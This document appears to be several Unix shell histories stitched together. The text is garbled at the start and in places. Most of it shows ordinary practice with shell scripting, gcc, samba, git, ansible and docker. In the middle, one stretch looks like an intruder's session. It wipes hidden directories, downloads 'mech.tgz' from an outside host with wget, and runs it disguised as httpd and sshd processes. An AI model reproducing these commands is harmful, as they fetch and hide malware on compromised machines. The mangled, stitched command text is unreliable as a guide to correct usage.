~/.bashrc ]] && . ~/.bashrc +startx" > /home/toeknee/.bash_profile/bin/sh +# +# ~/.xinitrc +# +# Executed by startx (run your window manager from here) + +if [ -d /etc/X11/xinit/xinitrc.d ]; then + for f in /etc/X11/xinit/xinitrc.d/*; do + [ -x "$f" ] && . "$f" + done + unset f +fi + +#exec gnome-session +#exec startkde +#Launches My Chosen Window Manager +/bin/sh +# +# ~/.xinitrc +# +# Executed by startx (run your window manager from here) + +if [ -d /etc/X11/xinit/xinitrc.d ]; then + for f in /etc/X11/xinit/xinitrc.d/*; do + [ -x "$f" ] && . "$f" + done + unset f +fi + +#exec gnome-session +#exec startkde +#Launches My Chosen Window Manager +exec startxfce4" > /home/toeknee/.bash_profile/bin/sh +# +# ~/.xinitrc +# +# Executed by startx -run your window manager from here + +if [ -d /etc/X11/xinit/xinitrc.d ]; then + for f in /etc/X11/ +printf "#printf "#printf "#printf "#sudo printf "# +# ~/.bash_profile +# +[[ -f ~/.bashrc ]] && . ~/.bashrc +startx" > /home/toeknee/.bash_profile/bin/sh +# +# ~/.xinitrc +# +# Executed by startx (run your window manager from here) + +if [ -d /etc/X11/xinit/xinitrc.d ]; then + for f in /etc/X11/xinit/xinitrc.d/*; do + [ -x "$f" ] && . "$f" + done + unset f +fi + +#exec gnome-session +#exec startkde +#Launches My Chosen Window Manager +/bin/sh +# +# ~/.xinitrc +# +# Executed by startx (run your window manager from here) + +if [ -d /etc/X11/xinit/xinitrc.d ]; then + for f in /etc/X11/xinit/xinitrc.d/*; do + [ -x "$f" ] && . "$f" + done + unset f +fi + +#exec gnome-session +#exec startkde +#Launches My Chosen Window Manager +exec startxfce4" > /home/toeknee/.bash_profile/bin/sh +# +# ~/.xinitrc +# +# Executed by startx -run your window manager from here + +if [ -d /etc/X11/xinit/xinitrc.d ]; then + for f in /etc/X11//bin/sh +# +# ~/.xinitrc +# +# Executed by startx -run your window manager from here +if [ -d /etc/X11/xinit/xinitrc.d ]; then + for f in /etc/X11/xinit/xinitrc.d/*; do + [ -x "$f" ] && . "$f" + done + unset f +fi +#exec gnome-session +#exec startkde +#Launches My Chosen Window Manager +exec startxfce4" > /home/toeknee/.bash_profile +logout +pacman -S dbus +exec startxfce4 +pacman -S xfce-session +pacman -S xfce4-session +pacman -S xfce4-session +exec startxfce4 +./build.sh -v + +./build.sh -v +sudo thunar +exec startxfce4 +exec startxfce4 +startx +logout +exec startxfce4 +startx +exec startxfce4 +startxfce4 +logout +sudo pkill -9 Xorg +startx +sudo apt-get install vim +sudo apt-get update +sudo apt-get install vim +sudo apt-get install g++ +g++ -v +sudo su +vi 1.c +vi 1.c +rm 1.c +sudo su +vi 1.c +sudo su +vi 1.c +gcc 1.c +./a.out +vi 1.c +vi 2.c +sudo su +sudo su +sudo syu +sudo su +ls +mkdir aaa +mv a.out aaa +ls +tar aaa.tar.gz aaa +tar aaa.tar.gz +tar -zcvf aaa.tar.gz +tar -zcvf aaa.tar.gz aaa +ls +tar -zxvf aaa.tar.gz +ls +ifconfig +ls +ls +ls +find ./ -name a.out +find ./ -name a* +ls +find ./ -name a* +find ./ -name aaa* +ls aaa* +cat 1.c +grep Hello 1.c +grep Hello 1.c -n +ls +touch a +touch b +touch c +ls +mv a aaa +mv b aaa +mv c aaa +ls +ls +ls +ls +clear +ls +tar -zcvf aaa.tar.gz +tar -zcvf aaa.tar.gz aaa +ls +mkdir bbb +ls +cp aaa.tar.gz bbb +ls +ls +tar -zxvf bbb.tar.gz +tar -zxvf aaa.tar.gz abab +tar -zxvf aaa.tar.gz aaa +ls +ls +ls +find ./ aa* +find ../ aa* +ls +ls +grep Hello 1.c +grep Hello 1.c -n +vi 1.c +whoami +pwd +sudo su +vi 1.c +sudo su +sudo apt-get install ssh-server +apt-get install ssh-server +sudo apt-get update +sudo apt-get install ssh-server +sudo apt-get install ssh +ssh -v +clear +sudo apt-get install ssh-client +sudo apt-get install ssh +sudo su +ls +sudo su +mkdir myWork +sudo apt-get intall samba +sudo apt-get install samba +sudo apt-fet install libtalloc2 +sudo apt-get install libtalloc2 +sudo vim /etc/samba/smb.conf +sudo killall smbd +sudo killall mnbd +sudo smbpasswd -a sht +sudo killall smbd +sudo killall mnbd + +sudo killall smbd +sudo killall nmbd +/etc/init.d/smbd start +/etc/init.d/nmbd start +ifconfig +sudo mkdir /home/share +sudo chmod 777 /home/share +ls +sudo vim /etc/samba/smb.conf +sudo smbpasswd -a sht +sudo killall smbd +sudo killall mnbd +/etc/init.d/smbd start +/etc/init.d/nmbd start +ifconfig +sudo service smbd restart +clear +vim /etc/samba/smb.conf +smbpasswd -a sht +sudo smbpasswd -a sht +mkdir /home/share +sudo killall smbd +sudo killall mnbd +/etc/init.d/smbd start +/etc/init.d/mnbd start +/etc/init.d/nmbd start +ifconfig +sudo services smbd restart +sudo service smbd restart +ifconfig +sudo passwd +mkdir /share +sudo su +ls +mkdir sssss +ls +mkdir /sss +sudo su +ifconfig +file ls +sudo su +vi a.sh +ls +./a.sh +a.sh +sudo su +sudo apt-get install nfs-kernel-server nfs-common portmap +sudo su +ls +ls +sudo su +vim hello.sh +chmod +x hello.sh +./hello.sh +ls +sudo su +clear +ls +touch a +ls -l +ls +ll +ls -l +vi create.sh +chmodx create.sh +./create.sj +./create.sh +vi create.sh +chmodx create.sh +./create.sj +./create.sh +ls +ls create +rm -rf create +ls +rm create.c +ls +rm aaa.tar.gz +ls +tar zxvf aaa.tar.gz +tar zxvf aaa +tar zcvf aaa.tar.gz +tar zcvf aaa +ls +ls aaa +tar zcvf aaa.tar.gz aaa +ls +cp aaa.tar.gz sssss +ls sssss +tar zxvf ./sssss/aaa.tar.gz +ls sssss +tar zxvf ./sssss/aaa.tar.gz aaa +ls sssss +ls +tar zxvf aaa.tar.gz +ls +ifconfig +ls +vi 1.c +sudo su +ls +vi 1.c +sudo su +echo $VERSION +echo ${HOME} +echo ${MAIL} +man echo +echo myname +echo $myname +myname=1 +echo $myname +echo "myname is $myname" +unset $myname +unset myname +echo $myname +ls -l +ll +ls +clear +root +sudo +vip +rot +sudosht +sudosu +sudosudo +sssss +1+1 +ls +ls +echo *.shh +echo *.sh +vi hello.sh +chmodx hello.sh +./hello.sh +vi hello.sh +vi helloexit.sh +chmodx helloexit.sh +./helloexit.sh +echo $? +./hello.sh +echo $? +vi readvar.sh +./readvar.sh +chmodx readvar.sh +./readvar.sh +vi echond.sh +chmodx echond.sh +./echond.sh +vi goodmoring.sh +chmodx goodmorning.sh +mv goodmoring.sh goodmorning.sh +chmodx goodmorning.sh +./goodmorning.sh +vi goodmoring.sh +rm moring.sh +rm goodmoring.sh +vi goodmorning.sh +./goodmorning.sh +vi goodmorning.sh +./goodmorning.sh +vi goodmorning.sh +./goodmorning.sh +vi goodmorning.sh +./goodmorning.sh +vi goodmorning.sh +./goodmorning.sh +vi goodmorning.sh +./goodmorning.sh +vi goodmorning.sh +./goodmorning.sh +vi goodmorning.sh +vi day.sh +chmodx day.sh +./day.sh +sudo su +ls +ls +vi aaaaaaaaaa.sh +run aaaaaaaaaa.sh +rm aaaaaaaaaa.sh +ls +vi findfile.sh +run findfile.sh +vi findfile.sh +run findfile.sh +vi password.sh +run password.sh +vi password.sh +run password.sh +vi casegoodmorning.sh +run casegoodmorning.sh +vi casegoodmorning.sh +run casegoodmorning.sh +vi goodmorning.sh +vi casegoodmorning.sh +run casegoodmorning.sh +vi casegoodmorning.sh +run casegoodmorning.sh +footest.sh +vi footest.sh +run footest.sh +vi footest.sh +run footest.sh +vo footest1.sh +vi footest1.sh +rm footest1.sh +sudo su +ls +vi run +ls +sudo su +ls /lib/libc-* +gcc version +gcc --version +sudo +sudo su +ls +vim 0dao100.sh +run 0dao100.sh +vim 0dao100.sh +run 0dao100.sh +vim 0dao100.sh +run 0dao100.sh +vim 0dao100.sh +run 0dao100.sh +vim 0dao100.sh +run 0dao100.sh +vim 0dao100.sh +run 0dao100.sh +vim 0dao100.sh +run 0dao100.sh +vi ls.sh +ls +vi ls.sh +run ls.sh +ls +vi ls.sh +run ls.sh +vi ls.sh +run ls.sh +run ls.sh /home +clear +vi 0dao100.sh +run 0dao100.sh +vi 0dao100.sh +run 0dao100.sh +vi 0dao100.sh +run 0dao100.sh +vi 0dao100.sh +vi case.sh +rm case.sh +ls +ps +kill -9 7664 +ps +kill -9 7668 +vi printfunc.sh +run printfunc.sh +vim foo.sh +run foo.sh +vim foo.sh +run foo.sh +vim foo.sh +vi hanshuchuandi.sh +run hanshuchuandi.sh +vi case.sh +run case.sh +vi case.sh +run case.sh +vi casefunc.sh +cp case.sh casefunc.sh +vi casefunc.sh +run echofunc.sh +run casefunc.sh +vi casefunc.sh +run casefunc.sh +vi casefunc.sh +run casefunc.sh +vi casefunc.sh +run casefunc.sh +vi casefunc.sh +run casefunc.sh +vi casefunc.sh +run casefunc.sh +vi casefunc.sh +run casefunc.sh +vi casefunc.sh +run casefunc.sh +find / -name. “*.sh” -type f +sudo su +vi duofenzhi.sh +run doufenzhi.sh +ls +chmod +x duofenzhi.sh +./duofenzhi.sh +run duofenzhi.sh +ls +ls +pwd +[ -e /home/sht/aaa ] || tar -zcvf aaa.tar.gz -C /home/sht/aaa +ls +[ -e /home/sht/aaa/aaa.tar.gz ] || tar -zcvf aaa.tar.gz -C /home/sht/aaa +[ -e /home/sht/aaa/a ] || tar -zcvf aaa.tar.gz -C /home/sht/aaa +ls +ls +ls +[ -e /home/sht/a.sh ] || tar -zcvf aaa.tar.gz -C /home/sht/ +ls +rm aaa.tar.gz +[ -e /home/sht/a.sh ] || tar -zcvf aaa.tar.gz -C /home/sht/ +ls +[ -e /home/sht/a.sh ] +ls +echo $? +sudo su +clear +ls aaa +clear +ls aaa +tar -zcvf aaa.tar.gz +clear +ls aaa +tar -zcvf aaa.tar.gz aaa +ls +mv aaa.tar.gz bbb +ls bbb +tar -zxvf aaa.tar.gz +ls +rm aaa.tar.gz +clear +clear +ls aaa +tar -zcvf aaa.tar.gz aaa +mv aaa.tar.gz bbb +ls bbb +tar -zxvf aaa.tar.gz +ls +rm -rf aaa +ls +tar -t aaa.tar.gz +tar -zxvf aaa.tar.gz +ls +tar -cvf aaa.tar +tar -cvf aaa.tar aaa +ls +tar -t aaa.tar +tar -vtzf aaa.tar +tar -ztvf aaa.tar +tar -ztv aaa.tar +tar -tvf aaa.tar +clear +tar -vft aaa.tar +tar -vtf aaa.tar +clear +tar -vtf aaa.tar +clear +tar -tvf aaa.tar +tar -tf aaa.tar +vi a1.sh +rm a1.sh +vim proc.sh +run proc.sh +ls +cat test.data +run proc.sh +ls +vi a1.sh +rm a1.sh +vim proc.sh +run proc.sh +vi proc.sh +run proc.sh +ls +vi week.sh +run week.sh +2 +run week.sh +cp ls.sh myls.sh +vi myls.sh +run.ls.sh +run ls.sh +vi myls.sh +run ls.sh +vi myls.sh +run myls.sh +vi myls.sh +run myls.sh +vi myls.sh +run myls.sh +vi proc.sh +vi myls.sh +vi proc.sh +vi myls.sh +run myls.sh /home +vi myls.sh +run myls.sh /home +run myls.sh +vi myls.sh +run myls.sh +vi myls.sh +run myls.sh +run myls.sh /home +run myls.sh /home/sht +run myls.sh /home/sht/aaa +awk +canshukuozhan.sh +vi canshukuozhan.sh +run canshukuozhan.sh +vi canshukuozhan.sh +rum canshukuozhan.sh +run canshukuozhan.sh +vi canshukuozhan.sh +run canshukuozhan.sh +vi canshukuozhan.sh +run canshukuozhan.sh +vi canshukuozhan.sh +run canshukuozhan.sh +Wq +vi canshukuozhan.sh +run canshukuozhan.sh +vi canshukuozhan.sh +run canshukuozhan.sh +vi myls.sh +run myls.sh +run myls.sh /home +vi myls.sh +run myls.sh /home +run myls.sh +pwd +ls/home +ls /home +run myls.sh +vi myls.sh +run myls.sh /home +run myls.sh +vi myls.sh +./ls.sh /home +./myls.sh /home +vi myls.sh +./myls.sh /home +vi myls.sh +vi print_num.sh +run print_num.sh +vi print_num.sh +run print_num.sh +vi print_num.sh +run print_num.sh +vi print_num.sh +run print_num.sh +vi print_num.sh +run print_num.sh +vi print_num.sh +run print_num.sh +vi print_num.sh +run print_num.sh +vi print_num.sh +run print_num.sh +vi print_num.sh +run print_num.sh +vi print_num.sh +run print_num.sh +vi print_num.sh +run print_num.sh +vi print_num.sh +run print_num.sh +vi print_num.sh +run print_num.sh +wq +mkdir -p shelltest/a/b/c/d/e +ls +rm -rf shelltest +ls +mkdir -p shell_test/a/b/c/d/e +ls +ls +touch root_dir.sh +ls +root_dir.sh $0 +dirname $0 +find -name root_dir.sh +vi find_root_dir.sh +run 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'1,$l' profile +cat profile +vi p4.c +./mygcc p4.c +ls +./mygcc.sh p4.c +sudo su +vi p2.c +gccc p2 +gccc p2.c +vi p2.c +gccc p2.c +vi p3.c +gccc 3.c +gccc p3.c +vi p8.c +gccc 8.c +gccc p8.c +ls +rm p5.c +ls +rm -rf p5.c +ls +gccc p6.c +ls +./p11 +rm p11 +ls +vi p9.c +gccc p9.c +vi 10.c +gccc p10.c +cp 10.c p10.c +cat p10.c +rm 10.c +gccc p10.c +ls +clear +vi p12.c +rm p12.c +vi p12_1.c +gccc p12.c +gccc p12_1.c +vi p12_1.c +gccc p12_1.c +vi p12_1.c +gccc p12_1.c +clear +vi p12_2.c +gccc p12_2.c +vi p14.c +gccc p14.c +vi p14.c +gccc p14.c +vi p14.c +gccc p14.c +vi p2.c +gccc 2.c +sudo su +ls +gccc p4.c +vi p11.c +gccc p11.c +cp p11.c p6.c +cat p6.c +rm p11.c +clear +diff profile profile1 +cat profile +awk 'gsub(/fi/,FI) {print $0)' profile +awk 'gsub(/fi/,FI) {print $0}' profile +cat profile +awk 'gsub(/1/,2) {print $0}' profile +cat profile +diff profile profile1 +awk 'BEGIN {print match("ANCD",/d/)}' +awk 'BEGIN {print match("ANCD",/C/)}' +awk 'BEGIN {print match("ANCD",/D/)}' +awk 'BEGIN {print match("$1",/u/)}' profile +awk 'BEGIN {print split("123#456#789", myarray, "#")}' +awk 'BEGIN {print split("123#456#789", myarray, "1")}' +awk 'BEGIN {print split("123#456#789", myarray, "#")}' +echo "Stand-by" {awk '(print length($0)}' +echo "Stand-by" | awk '{print length($0)}' +SRT="profile" +echo $STR |awk '{print substr($STR,7)}' +SRT="profile.txt" +echo $STR |awk '{print substr($STR,7)}' +awk 'BEGIN {printf "%c +",65}' +awk 'BEGIN {printf "%f +",65}' +echo "65" | awk '{printf "%c +",$0}' +who +env +awk '/^$/{print "This is a blank line."}' input +awk '/^$/{print "This is a blank line."}' +awk '/^$/{print "This is a blank line."}' profile +cat profile +awk '/^$/{print "This is a blank line."}' profile +touch input +awk '/^$/{print "This is a blank line."}' input +cat input +awk '/^$/{print "This is a blank line."}' > input +vi src1.awk +chmodx src1.awk +./src1.awk +vi src1.awk +run src1.awk +ls +awk -f src1.awk +vi src1.awk +awk -f src1.awk +sudo su +sudo apt-get update +ls +ls +ll +ls +vi hello.cpp +ifconfig +ls +vi p17.c +gccc p17.c +rm hello.cpp +ls +./hello.sh +hello.sh +vi hello.cpp +gcc hello.cpp +g++ hello.cpp +./a.out +ls +g++ p2.c +./a.out +run p10.c +clear +ls +gccc p12.c +clear +ls +gccc p10.c +clear +ls +gccc p2.c +vi /bin/gccc +clear +ls +vi p14.c +gccc p14.c +vi p15.c +gccc p15.c +vi p17.c +gccc p17.c +vi p17.c +gccc p17.c +vi p17.c +gccc p17.c +vi p17.c +gccc p17.c +vi p17.c +gccc p17.c +vi p17.c +gccc p17.c +sudo su +ifconfig +ls +tar -zvft qcd.tar.gz +tar -zvf -t qcd.tar.gz +ping www.baidu.com +ifconfig +route -n +ping www.baidu.com +ifconfig +ifconfig +ping +ping +ping +ping +ping +ping +ifconfig +ls / +ifconfig +ping +ls +tar -zxvf qcd.tar.gz +ls +ls +chmodx install +chmodx qcd +chmodx qcd.sh +sudo ./install +exit +ifconfig +ifconfig +su root +qcd +sudo su +vi 111 +root +su root +ls +rm p10 p12_1 p12_2 +ls +rm p14 p15 p17 p2 p3 p4 p6 p8 p9 +ls +cat gccc +vi gccall +rm gccall +vi gccall.sh +rm gccall.sh +sudo apt-get install gstm +ls +git add p2.c +sudo su +git commit -h +git push origin master +ls +git add p3.c +sudo su +ls +git add p3.c +git commit -m "p3.c" +git push origin master +ls +git add p4.c +sudo su +ls +git add p4.c +git commit -m "p4.c" +git add p8.c +sudo su +uname -a +ls -a +passwd +w +ls -a +ls -a +cat mech.session +ps x +w +ls +ls -a +ls +cat vuln.txt +ls +ls -a +rm -rf .borwind +ls +cat vuln.txt +ls +ls -a +ls -a +ls +ls -a +ls +ls -a +ls -a +cat mech.session +ls +ls -a +rm -rf .borwind .muie .m .l .crack +ls -a +ls -a +cat mech.session +ls -a +ls +ls -a +ls +ls +ls +ls -a +rm -rf * +ls -a +cat /proc/cpuinfo +wget medina.su/java/mech.tgz +tar zxvf mech.tgz +rm -rf mech.tgz +./h -s "/usr/sbin/httpd" ./mech +./h -s "/usr/sbin/sshd" ./mech +ls +rm -rf flash/ +ls -a +ls -ltr +ls -al .. +ls -altr +cat hosts +cat /etc/hosts +ssh web-client-1 +ssh web-client-2 +ssh app-client-1 +ssh app-client-2 +vi hosts +history |grep ping +ansible -m ping all +vi hosts +ansible -m ping all +gitconfig +pgit config +git config +pwd +l s-altr +ls -altr +ansible --version +ansible all --list-hosts +vagrant status +exit +ansible all --list-hosts +pwd +ls +ls +ansible all --list-hosts +cat hosts +ansible -m ping web-servers +ansible -m ping app-servers +ansible -m ping web-client-1 +ansible --version +ls +ls -altr +cat ansible.cfg +cat ansible.cfg |greo hosts +cat ansible.cfg |greop hosts +cat ansible.cfg |grep hosts +pwd +pwd +ansible -m ping web-client-1 +pwd +ansible --version +ansible --version +pwd +l +la +ls +cp projects/hosts . +ansible -m ping web-client-1 +ansible -m ping -i hosts web-client-1 +ansible all -m ping +ansible local -m setup +vi hosts +ansible all -m ping +ssh local +ssh localhost +ansible all -m ping +ansible local -m setup +ssh localhosts +ssh localhost +ansible local -m web-client-2 +ansible web-client-2 -m setup +vi hosts +ansible web-client-2 -m setup --tree /tmp/facts +ls -altr /tmp/ +ls +ls -altr +ansible web-client-2 -m setup -a 'filter=ansible_ip*' +ansible web-client-2 -m setup +ansible web-client-2 -m setup +ansible web-client-2 -m setup -a 'filter=ansible_ip' +ansible web-client-2 -m setup -a 'filter=*ip*' +ansible web-client-2 -m setup -a 'filter=*ipv4*' +cat hosts +ansible web-servers -m setup -a 'filter=ansible_architetcure' +ansible web-servers -m setup -a 'filter=ansible_architecture' +ansible web-servers -m setup -a 'filter=ansible_distribution' +ansible web-servers -m setup -a 'filter=ansible_dist*' +ansible web-servers -m setup |grep distribution +cat hosts +ansible web-client-1 -m setup |grep distribution +ansible web-client-1 -m setup -a 'filter=ansible_domain' +ansible web-client-1 -m setup -a 'filter=ansible_interfaces' +ansible web-client-1 -m setup -a 'filter=ansible_kernel' +ansible web-client-1 -m setup -a 'filter=ansible_mem*' +ansible web-client-1 -m setup -a 'filter=ansible_proc*' +ansible web-client-1 -m setup -a 'filter=ansible_virt*' +ansible web-client-1 -m setup -a 'filter=ansible_disk*' +ansible web-client-1 -m setup -a 'filter=ansible_storage*' +ansible web-client-1 -m setup -a 'filter=ansible_stor*' +ls -altr +ansible web-client-1 -s -m shell -a 'yum install lynx' +sudo visudo +id +sudo visudo +sudo ls +sudo visudo +groups +sudo ls -al +vi ansible.cfg +ssh-copypid localhost.localdomain +ssh-copyp-id localhost.localdomain +ssh-copy-id localhost.localdomain +vi hosts +ansible local -m ping +pwd +ls +pwd +exit +ansible -m ping all +pwd +ls +ansible -m ping all +ansible-all --list-hosts +ansible all --list-hosts +ansible all --list-groups +ansible all +ansible all |grep -i group +cat hosts +ansible all --list-hosts web-servers +ansible web-servers --list-hosts +ansible all -m ping +vi hosts +ansible all -m ping +vi hosts +ansible apacheweb -s -m shell -a 'yum list installed' |grep python +ansible apacheweb -s -m shell -a 'sudo yum list installed' |grep python +ansible app-client-2 -s -m shell -a 'yum list installed' |grep +ansible app-client-2 -s -m shell -a 'yum install o' +ansible app-client-2 -s -m shell -a 'yum install telnet' +ansible app-client-2 -s -m shell -a 'yum -y install telnet' +cat hosts +ansible web-servers -s -m shell -a 'yum -y install telnet' +ansible web-servers -s -m shell -a 'cat /var/log/smu.log' +ansible web-servers -b -m shell -a 'cat /var/log/smu.log' +ansible +ansible |less +ansible web-servers -b -m yum -a 'pkg=lynx state=installed update_cache=true' +ansible web-servers -b -m yum -a 'pkg=telnet state=installed' +clear +ls +mkdir Playbooks +vi appserver.yml +cat ../hosts +vi appserver.yml +cat appserver.yml +ansible-playbook -s Playbooks/appserver.yml +vi Playbooks/appserver.yml +git add . +owd +pwd +ls -altr +cat Playbooks/appserver.yml +ls -altr +vi Playbooks/appserver.yml +ansible-playbook -s Playbooks/appserver.yml +ping ansiblemn +cat /etc/hosts +vi Playbooks/appserver.yml +ansible-playbook -s Playbooks/appserver.yml +vi vars.yml +ansible-playbook -s Playbooks/appserver.yml +vi Playbooks/appserver.yml +ansible-playbook -s Playbooks/appserver.yml +ls -altr +mv vars.yml Playbooks/ +ansible-playbook -s Playbooks/appserver.yml +cat Playbooks/vars.yml +vi Playbooks/appserver.yml +ansible-playbook -s Playbooks/appserver.yml +ansible all --list-hosts +cat hosts +vi Playbooks/playbook1.yml +ansible-playbook Playbooks/playbook1.yml +c +cat Playbooks/playbook1.yml +mkdir conf +ls +vi copyright.yml +vi webdefaults.yml +ls -altr +cat copyright.yml +cat webdefaults.yml +vi Playbooks/playbook1.yml +ansible-playbook Playbooks/playbook1.yml +vi Playbooks/playbook1.yml +ls -al conf/ +vi Playbooks/playbook1.yml +cat Playbooks/playbook1.yml +cat conf/copyright.yml +cat conf/webdefaults.yml +vi Playbooks/playbook1.yml +ansible-playbook Playbooks/playbook1.yml +vi Playbooks/playbook1.yml +ansible-playbook Playbooks/playbook1.yml +vi Playbooks/playbook1.yml +ansible-playbook Playbooks/playbook1.yml +vi Playbooks/playbook1.yml +ansible-playbook Playbooks/playbook1.yml +vi Playbooks/playbook1.yml +ls +ls -altr +vi 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add . +git commit -m "initial commit" +git config --global user.email "jwidhalm@smu.edu" +git config --global user.name "John Widhalm" +git remote add origins8305/lecture-5.git +git push -u origin master +git remote add origin git@github.com:eets8305/lecture-5.git +git remote delete origins8305/lecture-5.git +git remote remove origins8305/lecture-5.git +ls -altr +rm -Rf .git +pwd +git init +git add . +git commit -m "first commit" +git remote add origin git@github.com:eets8305/lecture-5.git +git push -u origin master +ls -ltr +ls +ls -altr +ls +cat playbook1.yml +ls -altr +ls -altr conf/ +cat conf/copyright.yml +cat conf/we +cat conf/webdefaults.yml +ls -altr +ansible all --list-hosts +ls +ls -ltr +ls +ansible all --list-hosts +vi playbooks/playbook1.yml +git commit -am "added tasks" +git push -u origin master +ansible-playbook playbooks/playbook1.yml +vi playbooks/playbook1.yml +ansible-playbook -b playbooks/playbook1.yml +cat playbooks/playbook1.yml +ls -al playbooks/ +ssh web-client-1 +ls -altr +rm playbook1.retry +ls +vi playbooks/playbook1.yml +history +ansible-playbook -b playbooks/playbook1.yml +vi playbooks/playbook1.yml +ansible-playbook -b playbooks/playbook1.yml +cat playbooks/conf/copyright.yml +cat playbooks/conf/webdefaults.yml +vi playbooks/playbook1.yml +ansible-playbook -b playbooks/playbook1.yml +vi playbooks/playbook1.yml +ansible-playbook -b playbooks/playbook1.yml +vi playbooks/playbook1.yml +ansible-playbook -b playbooks/playbook1.yml +vi playbooks/playbook1.yml +ansible-playbook -b playbooks/playbook1.yml +vi playbooks/playbook1.yml +ansible-playbook -b playbooks/playbook1.yml +cat playbooks/conf/webdefaults.yml +vi playbooks/playbook1.yml +ansible-playbook -b playbooks/playbook1.yml +git commit -am "added a debug message" +git push -u origin master +cat playbooks/playbook1. +cat playbooks/playbook1.yml +pwd +vi playbooks/test.yml +ansible-playbook -b playbooks/test.yml +vi playbooks/playbook1. +vi playbooks/playbook1.yml +vi playbooks/test.yml +ansible-playbook -b playbooks/test.yml +vi playbooks/test.yml +ansible-playbook -b playbooks/test.yml +vi playbooks/test.yml +ansible-playbook -b playbooks/test.yml +vi playbooks/test.yml +vi playbooks/playbook1.yml +vi playbooks/playbook2.yml +ls -altr playbooks/ +vi playbooks/playbook1.yml +ansible-playbook -b playbooks/playbook1.yml +vi playbooks/playbook1.yml +ansible-playbook -b playbooks/playbook1.yml +vi playbooks/playbook1.yml +ansible-playbook -b playbooks/playbook1.yml +vi playbooks/playbook1.yml +ansible-playbook -b playbooks/playbook1.yml +vi playbooks/playbook1.yml +ansible-playbook -b playbooks/playbook1.yml +vi playbooks/playbook1.yml +ansible-playbook -b playbooks/playbook1.yml +vi playbooks/playbook1.yml +vi playbooks/facts.yml +ansible-playbook -b playbooks/facts.yml +vi playbooks/facts.yml +ansible-playbook -b playbooks/facts.yml +vi playbooks/facts.yml +ansible-playbook -b playbooks/facts.yml +vi playbooks/playbook1.yml +ansible-playbook -b playbooks/facts.yml +ansible-playbook -b playbooks/playbook1.yml +vi playbooks/playbook1.yml +ansible-playbook -b playbooks/playbook1.yml +vi playbooks/playbook1.yml +ansible-playbook -b playbooks/playbook1.yml +pwd +ls +ls -altr +ls -altr playbooks/ +vi playbooks/facts.yml +ansible web-client-2 -m setup +ansible web-client-2 -m setup |grep hostname +history |grep setup +ansible web-client-2 -m setup --tree facts.json +ls -ltr +vi facts.json/ +ls +vi web-client-2 +cat web-client-2 +:q +pwd +rm -Rf facts.json/ +ls -altr +ansible web-client-2 -m setup +ansible web-client-2 -m setup >facts.txt +vi facts.txt +vi playbooks/playbook1.yml +ansible-playbook -b playbooks/playbook1.yml +vi playbooks/playbook1.yml +ansible-playbook -b playbooks/playbook1.yml +vi playbooks/playbook1.yml +git commit -am "updated playbook" +git push -u orign master +pwd +history |grepp git +sudo apt-get install apt-transport-https ca-certificates curl software-properties-common +curl -fsSLsudo apt-key add - +sudo add-apt-repository "deb [arch=amd64]sb_release -cs) stable" +sudo apt-get install docker-ce +sudo docker run hello-world +sudo docker -version +sudo docker --version +sudo apt-get install docker-compose +ls +mkdir mydockercompose +mkdir webaps +mv webaps webapps +sudo nano docker-compose.yml +ls -rlt +cat>It works +cat >It works +cat > It works +cat>testfile.html +cat>Dockerfile +sudo docker-compose build +sudo docker compose up -d +ls +mkdir docker-mydb +ls +sudo chmod 777 docker-mydb +sudo docker-compose up -d +sudo docker-compose up -d +hostname +sudo docker ps +sudo apt install mysql-client-core-5.7 +ls +cat docker-compose.yml +ls +sudo nano docker-compose.yml +sudo docker-compose build +sudo docker-compose up -d +sudo docker ps +mysql --host -u root -p +mysql --host -u root -p +sudo docker images +sudo docker rm hello-world +sudo docker rmi hello-world +sudo docker rmi fce289e99eb9 +sudo docker ps -a +sudo docker rmi 88e58fa6b994 +sudo docker rm 88e58fa6b994 +sudo docker ps -a +sudo docker images +sudo docker rmi fce289e99eb9 +sudo docker images +sudo service docker status +ls +histort +history +ls +sudo docker-compose build +ls +sudo docker ps -a +sudo docker-compose up -d +ls -lrt +ls -rlt +cat Dockerfile +ls +sudo nano Dockerfile +ls +sudo docker-compose up -d +ps -ef|grep -i apache +sudo docker-compose up -d +sudo docker-compose build +sudo docker-compose up -d +ps -ef|grep -i apache +sudo docker ps +sudo docker logs c46aebd282d3 +ls +cat docker-compose.yml +ls +cat testfile.html +sudo nano docker-compose.yml +sudo docker-compose build +sudo docker-compose up -d +ls +ps -ef|grep -i httpd +ps -ef|grep -i apache +ls +mkdir testfolder +git pull -usha3/ +sudo apt-get git install +sudo git clonesha3/ +sudo git clonesha3/Index +ls +ls +ls -lrt +mkdir mytestimage +mkdir webapps +pwd +ls -lrt +ls -rlt +cat docker-compose.yml +ls +ls +cat Dockerfile +ls -lrt +ls +cat Dockerfilr +cat >Dockerfilr +ls +rm Dockerfilr +ls -lrt +sudo nano Dockerfile +ls -lrt +ll +ls +ls -lrt +ls +ll +ls +ls -lrt +pwd +locate index +pwd +ls -rlt +ls +ls +ls +mv index.html /home/ubuntu/mytestimage +ls +ls -lrt +chmod 777 index.html +chown -R ubuntu:ubuntu index.html +sudo su - +ls -rlt +ls -rlt +ls -rlt +ls +ll +pwd +ls +ls +mv index.html /home/ubuntu/mytestimage/webapps +ls -rlt +ls -rlt +ls +rm -rf testfolder +ls +pwd +ls +ls +cat docker-compose.yml +ls -rlt +sudo docker-compose.yml +sudo nano docker-compose.yml +sudo nano docker-compose build +LS +ls +history +sudo docker-compose build +ls +sudo nano docker-compose.yml +sudo docker-compose build +history +histort|up +sudo docker-compose up -d +ls +sudo nano docker-compose.yml +sudo docker-compose build +sudo docker-compose up -d +ls +sudo nano docker-compose.yml +ls +ls +sudo nano Dockerfile +sudo docker-compose build +sudo docker +ps -ef|grep -i apache +ls -lrt + +sudo docker ps -a +sudo docker-compose up -d +ls +cat docker-compose.yml +ls +sudo docker-compose up -d +sudo docker ps -a +ls +cat docker-compose.yml +ld +ls +ls +cat Dockerfile +sudo nano Dockerfile +ls -lrt +sudo docker-compose +sudo nano docker-compose.yml +sudo docker-compose build +sudo docker-compose up -d +ls +cat docker-compose.yml +ls +cat Dockerfile +ls +ls +ls +ls -rlt +pwd +su - root +sudo su - +sudo docker version +sudo docker-compose version +ls +exit +docker--version +docker-version +Docker-version +ll +ps -ef|grep -i java +ps -ef|grep - i apce +ps -ef|grep - i java +ps -ef|grep -i java +sudo docker ps +sudo docker stats e570c1f0bd99 +sudo docker pause e570c1f0bd99 +ls +ls +ls +ls +sudo docker ps4 +sudo docker ps +sudo docker pause b2176ffcdbab +sudo docker ps +sudo docker unpause b2176ffcdbab +history +ls +sudo docker-compose up -d +ls +sudo docker ps +sudo docker attach 8adc0724bd88 +ls 